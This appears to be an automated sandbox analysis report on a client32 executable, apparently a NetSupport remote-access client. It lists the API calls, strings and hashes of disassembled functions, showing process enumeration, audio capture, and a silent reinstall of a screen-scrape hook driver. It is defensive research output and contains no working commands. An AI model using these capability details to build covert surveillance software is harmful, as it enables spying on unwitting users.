Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateExchangeInterlockedNamedPipewsprintf$DescriptorErrorEventFileLastLocalSecuritySleep$AllocDaclFreeInitializeReadState
String ID: VistaUIPipe%d$\\.\pipe\nsm_%s$\\.\pipe\nsm_vistapipe%d
API String ID: 314772441-3428003663
Opcode ID: 156e08e3a05e9d95cd71096ee1ca53c2ef2cc4283ea66e10ff7e6104d074e3ed
Instruction ID: 604409057c20d5767275b15efd7dff91e3a1067eef8d912a0f96daa3085cfff4
Opcode Fuzzy Hash: 156e08e3a05e9d95cd71096ee1ca53c2ef2cc4283ea66e10ff7e6104d074e3ed
Instruction Fuzzy Hash: 4E617175E00326ABDB11CF65CC85FD9B7B8BF48724F108195FA459B284DBB4A980CFA1

Function 111033A0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 239libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,33E68B52,00000002,1102F550,00000000,00000000,11185D66,000000FF,?,111042CF,00000000,?,1102F550,00000000,00000000), ref: 111033DD

Part of subcall function 11134940: GetVersion.KERNEL32(00000000,76230BD0,00000000), ref: 11134963
Part of subcall function 11134940: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134984
Part of subcall function 11134940: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134994
Part of subcall function 11134940: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111349B1
Part of subcall function 11134940: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111349BD
Part of subcall function 11134940: _memset.LIBCMT ref: 111349D7

FreeLibrary.KERNEL32(00000000,?,111042CF,00000000,?,1102F550,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 1110342F
LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11103466
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111034EF
GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11103571
SetLastError.KERNEL32(00000078), ref: 11103593
SetLastError.KERNEL32(00000078), ref: 111035A0
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 111035B9
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,111042CF), ref: 11103620
GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,111042CF), ref: 11103647
CloseHandle.KERNEL32(?,?,?,?,?,?,111042CF), ref: 1110369F

Part of subcall function 111031C0: GetTickCount.KERNEL32 ref: 111031EE
Part of subcall function 111031C0: EnterCriticalSection.KERNEL32(111EB5C4), ref: 111031F7
Part of subcall function 111031C0: GetTickCount.KERNEL32 ref: 111031FD
Part of subcall function 111031C0: GetTickCount.KERNEL32 ref: 11103250
Part of subcall function 111031C0: LeaveCriticalSection.KERNEL32(111EB5C4), ref: 11103259

Part of subcall function 110F3B10: WaitForSingleObject.KERNEL32(?,00000000,111042CF,00000000,11103670,?,?,?,?,?,?,111042CF), ref: 110F3B21
Part of subcall function 110F3B10: InterlockedExchange.KERNEL32(00000034,00000000), ref: 110F3B2D
Part of subcall function 110F3B10: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,111042CF), ref: 110F3B38
Part of subcall function 110F3B10: InterlockedIncrement.KERNEL32(111EB5B4), ref: 110F3B65

CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 111036A6
FreeLibrary.KERNEL32(00000000,?,?,?,?,111042CF), ref: 111036F6
FreeLibrary.KERNEL32(00000000,?,?,?,?,111042CF), ref: 11103701

Strings

psapi.dll, xrefs: 111033D8
ProcessIdToSessionId, xrefs: 1110356B
EnumProcesses, xrefs: 111034D9
Kernel32.dll, xrefs: 11103461

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait_memset
String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
API String ID: 555709589-617439319
Opcode ID: a5d947fbb5b8c636c14cf2411a7b3e5640ecc7896dd4736b3cb5d483168ca619
Instruction ID: 262d17c24bbf6f2da612a94a309c0121f13d8fe000f9c238363a8b38863c95ea
Opcode Fuzzy Hash: a5d947fbb5b8c636c14cf2411a7b3e5640ecc7896dd4736b3cb5d483168ca619
Instruction Fuzzy Hash: 99A139B5D042AA9FDB249F558DC4ADEFBB4BB09304F4085EEE659E3240D7705AC08F61

Function 110CB540 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 210libraryloaderwindowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 110CB593
GetWindowRect.USER32(?,?), ref: 110CB60A
PtInRect.USER32(?), ref: 110CB651
PtInRect.USER32(?), ref: 110CB66D
SendMessageA.USER32(?,000000F3,00000000,00000000), ref: 110CB69D
PostMessageA.USER32(?,000000F5,00000000,00000000), ref: 110CB6B3
GetProcAddress.KERNEL32(?,CloseTouchInputHandle), ref: 110CB6D5
SetLastError.KERNEL32(00000078), ref: 110CB6EC
FreeLibrary.KERNEL32(?), ref: 110CB6F7
LoadLibraryA.KERNEL32(User32.dll,33E68B52), ref: 110CB709
GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 110CB755
SetLastError.KERNEL32(00000078), ref: 110CB76A
FreeLibrary.KERNEL32(00000000), ref: 110CB775
CallWindowProcA.USER32(00000000,?,?,?,?), ref: 110CB78E

Strings

User32.dll, xrefs: 110CB704
RegisterTouchWindow, xrefs: 110CB74C
CloseTouchInputHandle, xrefs: 110CB6CF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryProcRectWindow$AddressErrorFreeLastMessage$CallLoadLongPostSend
String ID: CloseTouchInputHandle$RegisterTouchWindow$User32.dll
API String ID: 320639544-3447865954
Opcode ID: 2a44ef56ee1dbbeb8edf68e9a5e14f049a8591195f228b6ad0b50fed25ae15b5
Instruction ID: 9605b6dc208fd10234ee60dad22e38938f688f27b0e28ba42b0a12974398667d
Opcode Fuzzy Hash: 2a44ef56ee1dbbeb8edf68e9a5e14f049a8591195f228b6ad0b50fed25ae15b5
Instruction Fuzzy Hash: 34715DB1D006299BDB11CFA9CC88B9EBBF8FB48B44F10816AF915E7240DB749900DF61

Function 110F5260 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

SetCursor.USER32(00000000,?,00000000), ref: 110F532B
ShowCursor.USER32(00000000), ref: 110F5338
OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F5349
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5373
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5392
TranslateMessage.USER32(?), ref: 110F53A3
DispatchMessageA.USER32(?), ref: 110F53AC
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F53C0
CloseHandle.KERNEL32(?), ref: 110F53D3
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F53EB
TranslateMessage.USER32(?), ref: 110F53FE
DispatchMessageA.USER32(?), ref: 110F5407
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F541A
ShowCursor.USER32(00000001), ref: 110F5422
SetCursor.USER32(?), ref: 110F542F

Strings

NSLockExit, xrefs: 110F533E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_malloc_memsetwsprintf
String ID: NSLockExit
API String ID: 3841144343-1578567420
Opcode ID: d21bb14c51d0a93eccf7808a66f258af782e1aa5e4de8ac9f8048c2faada070e
Instruction ID: 3ec78e4f8b4bb7706475246cd36eab5ea8ef41e4641662f994a15a4eba65df2e
Opcode Fuzzy Hash: d21bb14c51d0a93eccf7808a66f258af782e1aa5e4de8ac9f8048c2faada070e
Instruction Fuzzy Hash: 7B51BE71E0032AABDB11DFA48C81FEDB7B8EB44714F1085A5F615E7184EB75AA40CF91

Function 11157330 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetSubMenu.USER32(00000000,?), ref: 11157385
GetMenuItemCount.USER32(?), ref: 11157397
GetMenuItemCount.USER32(?), ref: 111573A1
_memset.LIBCMT ref: 111573B1
GetMenuItemInfoA.USER32(?,-00000001,00000001,?), ref: 111573D8
DeleteMenu.USER32(?,-00000001,00000400,?,?), ref: 111573F1
GetMenuItemCount.USER32(?), ref: 111573F8
_memset.LIBCMT ref: 11157409
wsprintfA.USER32 ref: 1115748B
IsWindowVisible.USER32(76931A30), ref: 111574A1

Strings

C, xrefs: 1115741E
&%d %s, xrefs: 1115747F
0, xrefs: 111573C4
0, xrefs: 11157414

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Count$_memset$DeleteInfoVisibleWindowwsprintf
String ID: &%d %s$0$0$C
API String ID: 1944744249-1709426716
Opcode ID: 9eea2fadec3ce864281c6abc28e440551e002f1ced7b7bc10ecc030730f533e1
Instruction ID: dfb5db35ea2e9868c4485c82fb455626a52efbcf2d4823039bc7d40a6743781c
Opcode Fuzzy Hash: 9eea2fadec3ce864281c6abc28e440551e002f1ced7b7bc10ecc030730f533e1
Instruction Fuzzy Hash: ED51E571D006299BDB91CF64CC85BEEF7B8FF45318F408099E919A7241EB74AA81CF91

Function 11027570 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 139processCOMMON

Download Yara Rule

APIs

Part of subcall function 11141440: GetVersionExA.KERNEL32(111EBE98,76938400), ref: 11141470
Part of subcall function 11141440: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111414AF
Part of subcall function 11141440: _memset.LIBCMT ref: 111414CD
Part of subcall function 11141440: _strncpy.LIBCMT ref: 1114159A

Part of subcall function 110B69B0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B69D6
Part of subcall function 110B69B0: GetProcAddress.KERNEL32(00000000), ref: 110B69DD
Part of subcall function 110B69B0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B69F3

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

Part of subcall function 110EAE40: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000000,?,?,1102FF05,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110EAE5C

GetSystemMetrics.USER32(00000043), ref: 11027644

Part of subcall function 11140F70: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11190A88), ref: 11140FDD
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110C55B), ref: 1114101E
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114107B

wsprintfA.USER32 ref: 1102766B

Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110C55B,76938400,?), ref: 1113F667
Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F687
Part of subcall function 1113F5D0: CloseHandle.KERNEL32(00000000), ref: 1113F68F

wsprintfA.USER32 ref: 11027695
_memset.LIBCMT ref: 110276D0
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027725
CloseHandle.KERNEL32(?), ref: 1102773C
CloseHandle.KERNEL32(?), ref: 11027745

Strings

System\CurrentControlSet\Services\Gdihook5, xrefs: 110275FD
"%sWINSTALL.EXE", xrefs: 11027665
AutoInstallGdihook5, xrefs: 1102762B
D, xrefs: 110276DC
"%sWINST32.EXE", xrefs: 1102768F
Client, xrefs: 110275DB, 11027630
Trying to reinstall gdihook5, xrefs: 110276D7
screenscrape, xrefs: 110275D6
/Q /Q, xrefs: 110276A9

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcess_memsetwsprintf$AddressCurrentMetricsNameProcSystemVersion__wcstoi64_strncpy
String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
API String ID: 1724249554-531500863
Opcode ID: 4067a18af75c85c8423e739b2753731fa6e8540c9292c3041df855ff12065183
Instruction ID: d878de74477830e73ac1ec4c0dc0b65156a0561db1c233112b23bd44fe56180c
Opcode Fuzzy Hash: 4067a18af75c85c8423e739b2753731fa6e8540c9292c3041df855ff12065183
Instruction Fuzzy Hash: 2B41F675E4032AAAE750DBA0CC85FE9F7B8AB14708F5041E6EA29B71C0EB70B544CB55

Function 110035A0 Relevance: 27.2, APIs: 18, Instructions: 171COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 110035E1

Part of subcall function 1113E8B0: SetBkColor.GDI32(?,00000000), ref: 1113E8C4
Part of subcall function 1113E8B0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1113E8D9
Part of subcall function 1113E8B0: SetBkColor.GDI32(?,00000000), ref: 1113E8E1

CreateSolidBrush.GDI32(00000000), ref: 110035F5
GetStockObject.GDI32(00000007), ref: 11003600
SelectObject.GDI32(?,00000000), ref: 1100360B
SelectObject.GDI32(?,?), ref: 1100361C
GetSysColor.USER32(00000010), ref: 1100362C
GetSysColor.USER32(00000010), ref: 11003643
GetSysColor.USER32(00000014), ref: 1100365A
GetSysColor.USER32(00000014), ref: 11003671
GetSysColor.USER32(00000014), ref: 1100368E
GetSysColor.USER32(00000014), ref: 110036A5
GetSysColor.USER32(00000010), ref: 110036BC
GetSysColor.USER32(00000010), ref: 110036D3
InflateRect.USER32(?,000000FE,000000FE), ref: 110036F0
Rectangle.GDI32(?,?,00000001,?,?), ref: 1100370A
SelectObject.GDI32(?,?), ref: 1100371E
SelectObject.GDI32(?,?), ref: 11003728
DeleteObject.GDI32(?), ref: 1100372E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
String ID:
API String ID: 3698065672-0
Opcode ID: 949de5423cbae4a7733fd7b98d42b8870f3f057ecdd653d309a45bb98925aeea
Instruction ID: 247f9fdd16ab91c4edc1bc6463a28d4ac53205bb168c799cb13fc2071466771e
Opcode Fuzzy Hash: 949de5423cbae4a7733fd7b98d42b8870f3f057ecdd653d309a45bb98925aeea
Instruction Fuzzy Hash: 55515DB5900319AFDB10DBA5CC85EBFF3BCEB98314F104A18F611A7291D671B9458BA1

Function 1100B2D0 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

_malloc.LIBCMT ref: 1100B326

Part of subcall function 1115F231: __FF_MSGBANNER.LIBCMT ref: 1115F24A
Part of subcall function 1115F231: __NMSG_WRITE.LIBCMT ref: 1115F251
Part of subcall function 1115F231: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F276

Part of subcall function 1100AC00: EnterCriticalSection.KERNEL32(000000FF,33E68B52,?,00000000,00000000), ref: 1100AC44
Part of subcall function 1100AC00: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AC62
Part of subcall function 1100AC00: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACAE
Part of subcall function 1100AC00: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100ACF5
Part of subcall function 1100AC00: CloseHandle.KERNEL32(00000000), ref: 1100ACFC
Part of subcall function 1100AC00: _free.LIBCMT ref: 1100AD13
Part of subcall function 1100AC00: FreeLibrary.KERNEL32(?), ref: 1100AD2B
Part of subcall function 1100AC00: LeaveCriticalSection.KERNEL32(?), ref: 1100AD35

EnterCriticalSection.KERNEL32(1100CA6A,Audio,DisableSounds,00000000,00000000,33E68B52,?,1100CA5A,00000000,?,1100CA5A,?), ref: 1100B35B
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA5A,?), ref: 1100B378
_calloc.LIBCMT ref: 1100B3A9
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA5A,?), ref: 1100B3CF
LeaveCriticalSection.KERNEL32(1100CA6A,?,1100CA5A,?), ref: 1100B409
LeaveCriticalSection.KERNEL32(1100CA5A,?,?,1100CA5A,?), ref: 1100B42E

Strings

Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B4DC
InitCaptureSounds NT6, xrefs: 1100B44E
DisableSounds, xrefs: 1100B302
Audio, xrefs: 1100B307
Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B483
\\.\NSAudioFilter, xrefs: 1100B370
Vista new pAudioCap=%p, xrefs: 1100B493
Vista AddAudioCapEvtListener(%p), xrefs: 1100B4B3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
